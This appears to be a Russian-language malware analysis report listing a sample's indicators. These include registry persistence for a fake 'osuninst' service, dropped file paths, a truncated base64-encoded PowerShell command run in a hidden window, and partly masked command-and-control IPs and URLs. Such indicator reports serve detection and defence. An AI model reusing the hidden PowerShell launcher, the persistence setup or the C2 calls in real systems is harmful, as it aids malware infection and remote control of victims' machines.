Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\osuninst] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\osuninst] 'ImagePath' = '"<SYSTEM32>\sxssrv\osuninst.exe"'
- 'osuninst' "<SYSTEM32>\sxssrv\osuninst.exe"
- 'osuninst' <SYSTEM32>\sxssrv\osuninst.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe
- <SYSTEM32>\sxssrv\osuninst.exe
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe в <SYSTEM32>\sxssrv\osuninst.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://ti###servis.com/cgi-bin/fqo/
- http://91.###.54.71:8080/CdnCPsEDoao73dSj69E/39vFm4JMAnxBO3/6qYcQk46CAqb/uhI8IhDZ9jTTC0FgFNs/ via 91.##1.54.71
- DNS ASK ti###servis.com
- '%HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe'
- '<SYSTEM32>\sxssrv\osuninst.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...' (со скрытым окном)